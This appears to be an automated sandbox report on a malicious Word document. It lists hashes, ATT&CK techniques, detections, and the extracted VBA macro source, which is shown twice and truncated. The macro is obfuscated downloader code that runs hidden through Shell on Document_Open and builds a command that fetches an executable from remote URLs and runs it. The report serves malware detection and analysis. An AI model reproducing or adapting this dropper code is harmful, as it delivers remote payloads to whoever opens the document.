Office (OLE) malware analysis — malicious · 30e3ac01583aefdc

MALICIOUS

Office (OLE)

72.5 KB Created: 2018-09-07 07:47:00 Authoring application: Microsoft Office Word First seen: 2018-10-13

MD5: 27738ce09fb3733ed5ca3776578399f5 SHA-1: a9e94b135cf4382c243fdd878ad509b174a3223f SHA-256: 30e3ac01583aefdc2d0e5f216e91609a33c2e0fb4dd9a65f5f3d0b70b12bcd81

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call within the Document_Open subroutine to execute a command. This command is constructed by concatenating several obfuscated strings, likely to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6680504-0' further supports the downloader functionality.

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6680504-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6680504-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6102 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6102 bytes
SHA-256: `475934794e74d398ea574ec9b06082ee4b28488ddbb102e9adff9742c92b6629`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XsYDGDIwzicLo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Month Format("zFwUSkZ" + "Owl" + "nk" + "118846365") Month Format("vR" + "jPL" + "152252932" + "3909") Month Format("ZXnjcUbLquHN" + "8501" + "7907" + "220975800") Shell Format(NrQjDdP) + Format(iEzOmmvUjXqbRZ) + Format(oRIUQobufUHDak) + AUlKUW + hEGTOYnCm + Format(pcDiRirtwBA) + Format(lFXTpwiWhOfaZp), Format(vbHide) Month Format("vWLa" + "IN" + "IspTCaq" + "245912721") Month Format("DYlJ" + "wALLOD" + "5179" + "j") Month Format("8413" + "VKiU") End Sub Attribute VB_Name = "CnBwhfPfWWCR" Function AUlKUW() On _ Error _ Resume _ Next Month Format("8584" + "d") utmoBvzzjOR = Chr(7 + 2 + 14 + 13 + 63) + "md /V" + "^:/" + Chr(4 + 1 + 10 + 9 + 43) + Chr(2 + 0 + 4 + 4 + 24) + "^s^" + "et ^" + "H^Z=^ " + "^" + " ^ " + " ^ ^ " + " ^ ^ " + " " + "^ ^ " + "}^}{^" + "h" + Chr(7 + 2 + 14 + 13 + 63) + "t^a" + Chr(7 + 2 + 14 + 13 + 63) + "}" Month Format("348262671" + "jRUZVTaK") Month Format("np" + "293208402") pzNDGQES = "^" + ";k" + "^a^e" + "rb;vX^" + "d$ ^m^e" + "^t^I" + "-^e^kov" + "n^I" + "^;)v^X" + "d" + "$^" + " ,^BK^m" + "$(e" Month Format("317102334" + "233382953" + "QkK" + "vl") Month Format("9239" + "2493") Month Format("107656055" + "318852053") LszIvVOVzFt = "li^Fd" + "^" + "a^o" + "lnw" + "^oD." + "^t^DN" Month Format("PTcjZNV" + "441988882") Month Format("vAER" + "izrKDnp") Month Format("kmSu" + "245589811") PvQjMzBhOUX = "^$^{yr" + "^" + "t{)^f" + "vR$^ n^" + "i BK" Month Format("146981492" + "XYsKJhEY") Month Format("2606" + "fzuGXaF" + "rIpIRR" + "owqZ") Month Format("2882" + "rBH") bsblwsqDBq = "^m^" + "$(h" + Chr(0 + 8 + 11 + 5 + 75) + "a" + "^e" + "r^of;^'" + "ex^e^." + "'^+s^P" Month Format("ZrZNqIwipkQk" + "ICaHwAWMaCKR" + "qaKcfSz" + "404") Month Format("KWKj" + "CLiH" + "K" + "kOfsTI") Month Format("mIvChmjwHEstKt" + "UPnp") dnRwr = "j" + "^$^" + "+^'" + "\^'+" + Chr(0 + 8 + 11 + 5 + 75) + "^i" + "^l^bup^" + ":vne^$=" + "v" + "Xd" + "^$;'" + "2" + "^71' ^=" Month Format("3198" + "8979" + "458" + "FRH") Month Format("Vpri" + "137747448") Month Format("RT" + "JTl" + "tHooScz" + "PwSRVTMFzki") Unjvsviidl = " ^sPj^" + "$^;)^'^" + "@^" + "'(^t" + "i^lp^" + "S^." + "'^m" + "/^m" + "^o" + Chr(0 + 8 + 11 + 5 + 75) + "^.zen" + "^e^m" + "^" Month Format("9269" + "NO") Month Format("IjiH" + "257585412" + "4383" + "F") Month Format("Vqihf" + "dF") uGiHIfGM = "i^j^l^" + "op//^:p" + "^t^" + "t^" + "h" + "^@5" + "m^" + "k/" + "s" + "^edu^" + "l" + Chr(0 + 8 + 11 + 5 + 75) + "n^i/n" Month Format("327168048" + "ncfJL") Month Format("iYlp" + "o") Month Format("2689" + "SjkqFh" + "NLjDrOTCCiH" + "YiJWrDUEi") TuYtwYfTZzG = "^" + "imda^-" + "pw/m" + "o" + Chr(0 + 8 + 11 + 5 + 75) + "^." + "re^ma" + "^" + "g^i" + "t^" + "l^u^.ww" + "^w//" + "^:^ptt^" + "h@" Month Format("YXELBiz" + "zK" + "iGuoRz" + "506972982") Month Format("tnk" + "FvutaM") DwLZYFwFfi = "R^s^k" + "YT^0/m" + "^o" + Chr(0 + 8 + 11 + 5 + 75) + ".r^e" + "tt^ert" + "r^" Month Format("3678" + "8189") Month Format("U" + "uLMzaBUA" + "PjsLkzmwsFJHcv" + "UIAzWoZrsJ") Month Format("I" + "134133582") Month Format("LCs" + "8711" + "j" + "uzPGpXB") Month Format("bTX" + "otp" + "61206136" + "5195") Month Format("8326" + "jKt") jKAibOlcwW = "et^ep/" + "/^:^" + "p^t" + "^t" + "^h@X^" + "W^" + "I^A^7" + "l^Z/ofn" + "^i^.n" + "er^t^l" AUlKUW = utmoBvzzjOR + pzNDGQES + LszIvVOVzFt + PvQjMzBhOUX + bsblwsqDBq + dnRwr + Unjvsviidl + uGiHIfGM + TuYtwYfTZzG + DwLZYFwFfi + jKAibOlcwW Month Format("RBViK" + "sACVRKiG") Month Format("RP" + "77994611") Month Format("QlA" + "AlXKGDV" + "1399" + "kCCw") End Function Function hEGTOYnCm() On _ Error _ Resume _ Next Month Format("W" + " ... (truncated)

SHA-256: 475934794e74d398ea574ec9b06082ee4b28488ddbb102e9adff9742c92b6629

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XsYDGDIwzicLo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month Format("zFwUSkZ" + "Owl" + "nk" + "118846365")
   Month Format("vR" + "jPL" + "152252932" + "3909")
   Month Format("ZXnjcUbLquHN" + "8501" + "7907" + "220975800")
Shell Format(NrQjDdP) + Format(iEzOmmvUjXqbRZ) + Format(oRIUQobufUHDak) + AUlKUW + hEGTOYnCm + Format(pcDiRirtwBA) + Format(lFXTpwiWhOfaZp), Format(vbHide)
   Month Format("vWLa" + "IN" + "IspTCaq" + "245912721")
   Month Format("DYlJ" + "wALLOD" + "5179" + "j")
   Month Format("8413" + "VKiU")
End Sub



Attribute VB_Name = "CnBwhfPfWWCR"
Function AUlKUW()

On _
Error _
Resume _
Next
Month Format("8584" + "d")
utmoBvzzjOR = Chr(7 + 2 + 14 + 13 + 63) + "md /V" + "^:/" + Chr(4 + 1 + 10 + 9 + 43) + Chr(2 + 0 + 4 + 4 + 24) + "^s^" + "et ^" + "H^Z=^ " + "^" + " ^ " + "  ^ ^ " + " ^ ^   " + " " + "^   ^ " + "}^}{^" + "h" + Chr(7 + 2 + 14 + 13 + 63) + "t^a" + Chr(7 + 2 + 14 + 13 + 63) + "}"
Month Format("348262671" + "jRUZVTaK")
   Month Format("np" + "293208402")
pzNDGQES = "^" + ";k" + "^a^e" + "rb;vX^" + "d$ ^m^e" + "^t^I" + "-^e^kov" + "n^I" + "^;)v^X" + "d" + "$^" + " ,^BK^m" + "$(e"
Month Format("317102334" + "233382953" + "QkK" + "vl")
   Month Format("9239" + "2493")
   Month Format("107656055" + "318852053")
LszIvVOVzFt = "li^Fd" + "^" + "a^o" + "lnw" + "^oD." + "^t^DN"
Month Format("PTcjZNV" + "441988882")
   Month Format("vAER" + "izrKDnp")
   Month Format("kmSu" + "245589811")
PvQjMzBhOUX = "^$^{yr" + "^" + "t{)^f" + "vR$^ n^" + "i BK"
Month Format("146981492" + "XYsKJhEY")
   Month Format("2606" + "fzuGXaF" + "rIpIRR" + "owqZ")
   Month Format("2882" + "rBH")
bsblwsqDBq = "^m^" + "$(h" + Chr(0 + 8 + 11 + 5 + 75) + "a" + "^e" + "r^of;^'" + "ex^e^." + "'^+s^P"
Month Format("ZrZNqIwipkQk" + "ICaHwAWMaCKR" + "qaKcfSz" + "404")
   Month Format("KWKj" + "CLiH" + "K" + "kOfsTI")
   Month Format("mIvChmjwHEstKt" + "UPnp")
dnRwr = "j" + "^$^" + "+^'" + "\^'+" + Chr(0 + 8 + 11 + 5 + 75) + "^i" + "^l^bup^" + ":vne^$=" + "v" + "Xd" + "^$;'" + "2" + "^71' ^="
Month Format("3198" + "8979" + "458" + "FRH")
   Month Format("Vpri" + "137747448")
   Month Format("RT" + "JTl" + "tHooScz" + "PwSRVTMFzki")
Unjvsviidl = " ^sPj^" + "$^;)^'^" + "@^" + "'(^t" + "i^lp^" + "S^." + "'^m" + "/^m" + "^o" + Chr(0 + 8 + 11 + 5 + 75) + "^.zen" + "^e^m" + "^"
Month Format("9269" + "NO")
   Month Format("IjiH" + "257585412" + "4383" + "F")
   Month Format("Vqihf" + "dF")
uGiHIfGM = "i^j^l^" + "op//^:p" + "^t^" + "t^" + "h" + "^@5" + "m^" + "k/" + "s" + "^edu^" + "l" + Chr(0 + 8 + 11 + 5 + 75) + "n^i/n"
Month Format("327168048" + "ncfJL")
   Month Format("iYlp" + "o")
   Month Format("2689" + "SjkqFh" + "NLjDrOTCCiH" + "YiJWrDUEi")
TuYtwYfTZzG = "^" + "imda^-" + "pw/m" + "o" + Chr(0 + 8 + 11 + 5 + 75) + "^." + "re^ma" + "^" + "g^i" + "t^" + "l^u^.ww" + "^w//" + "^:^ptt^" + "h@"
Month Format("YXELBiz" + "zK" + "iGuoRz" + "506972982")
   Month Format("tnk" + "FvutaM")
DwLZYFwFfi = "R^s^k" + "YT^0/m" + "^o" + Chr(0 + 8 + 11 + 5 + 75) + ".r^e" + "tt^ert" + "r^"
Month Format("3678" + "8189")
   Month Format("U" + "uLMzaBUA" + "PjsLkzmwsFJHcv" + "UIAzWoZrsJ")
   Month Format("I" + "134133582")
   Month Format("LCs" + "8711" + "j" + "uzPGpXB")
   Month Format("bTX" + "otp" + "61206136" + "5195")
   Month Format("8326" + "jKt")
jKAibOlcwW = "et^ep/" + "/^:^" + "p^t" + "^t" + "^h@X^" + "W^" + "I^A^7" + "l^Z/ofn" + "^i^.n" + "er^t^l"
AUlKUW = utmoBvzzjOR + pzNDGQES + LszIvVOVzFt + PvQjMzBhOUX + bsblwsqDBq + dnRwr + Unjvsviidl + uGiHIfGM + TuYtwYfTZzG + DwLZYFwFfi + jKAibOlcwW
   Month Format("RBViK" + "sACVRKiG")
   Month Format("RP" + "77994611")
   Month Format("QlA" + "AlXKGDV" + "1399" + "kCCw")
End Function
Function hEGTOYnCm()

On _
Error _
Resume _
Next
Month Format("W" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.